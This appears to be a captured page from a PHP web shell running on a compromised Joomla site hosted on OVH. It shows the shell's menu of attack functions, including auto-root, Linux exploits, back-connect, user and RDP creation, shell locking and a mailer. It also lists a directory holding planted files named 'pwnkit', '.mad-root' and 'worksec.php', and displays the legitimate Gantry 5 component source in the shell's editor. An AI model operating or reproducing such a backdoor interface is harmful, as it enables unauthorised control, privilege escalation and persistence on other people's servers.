Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
ptitsanes /
components /
com_gantry5 /
[ HOME SHELL ]
Name
Size
Permission
Action
fields
[ DIR ]
drwx---r-x
views
[ DIR ]
drwx---r-x
.htaccess
420
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
MD5SUMS
246
B
-rw----r--
gantry5.php
3.37
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
router.php
2.03
KB
-rw-r--r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gantry5.php
<?php /** * @package Gantry 5 * @author RocketTheme http://www.rockettheme.com * @copyright Copyright (C) 2007 - 2021 RocketTheme, LLC * @license GNU/GPLv2 and later * * http://www.gnu.org/licenses/gpl-2.0.html */ defined('_JEXEC') or die; use Gantry\Framework\Gantry; use Gantry\Framework\Theme; use Joomla\CMS\Application\CMSApplication; use Joomla\CMS\Factory; use Joomla\CMS\Language\Text; use Joomla\Registry\Registry; /** @var CMSApplication $application */ $application = Factory::getApplication(); // Detect Gantry Framework or fail gracefully. if (!class_exists('Gantry\Framework\Gantry')) { $language = $application->getLanguage(); $language->load('com_gantry5', JPATH_ADMINISTRATOR) || $language->load('com_gantry5', JPATH_ADMINISTRATOR . '/components/com_gantry5'); $application->enqueueMessage( Text::sprintf('COM_GANTRY5_PARTICLE_NOT_INITIALIZED', Text::_('COM_GANTRY5_COMPONENT')), 'warning' ); return; } $document = $application->getDocument(); $input = $application->input; $menu = $application->getMenu(); $menuItem = $menu->getActive(); $gantry = Gantry::instance(); // Prevent direct access without menu item. if (!$menuItem) { if (isset($gantry['errors'])) { /** @var \Whoops\Run $errors */ $errors = $gantry['errors']; $errors->unregister(); } throw new Exception(Text::_('JLIB_APPLICATION_ERROR_COMPONENT_NOT_FOUND'), 404); } // Handle non-html formats and error page. if ($input->getCmd('view') === 'error' || $input->getInt('g5_not_found') || strtolower($input->getCmd('format', 'html')) !== 'html') { if (isset($gantry['errors'])) { /** @var \Whoops\Run $errors */ $errors = $gantry['errors']; $errors->unregister(); } throw new Exception(Text::_('JERROR_PAGE_NOT_FOUND'), 404); } $gantry = Gantry::instance(); /** @var Theme $theme */ $theme = $gantry['theme']; /** @var Registry $params */ $params = $application->getParams(); // Set page title. $title = $params->get('page_title'); if (empty($title)) { $title = $application->get('sitename'); } elseif ($application->get('sitename_pagetitles', 0) == 1) { $title = Text::sprintf('JPAGETITLE', $application->get('sitename'), $title); } elseif ($application->get('sitename_pagetitles', 0) == 2) { $title = Text::sprintf('JPAGETITLE', $title, $application->get('sitename')); } $document->setTitle($title); // Set description. if ($params->get('menu-meta_description')) { $document->setDescription($params->get('menu-meta_description')); } // Set Keywords. if ($params->get('menu-meta_keywords')) { $document->setMetaData('keywords', $params->get('menu-meta_keywords')); } // Set robots. if ($params->get('robots')) { $document->setMetaData('robots', $params->get('robots')); } /** @var object $params */ if ($params->get('particle')) { $data = json_decode($params->get('particle'), true); } else { $data = false; } if (!$data) { // No component output. return; } $context = [ 'gantry' => $gantry, 'noConfig' => true, 'inContent' => true, 'segment' => [ 'id' => 'main-particle', 'type' => $data['type'], 'classes' => $params->get('pageclass_sfx'), 'subtype' => $data['particle'], 'attributes' => $data['options']['particle'], ] ]; // Render the particle. echo trim($theme->render('@nucleus/content/particle.html.twig', $context));
Close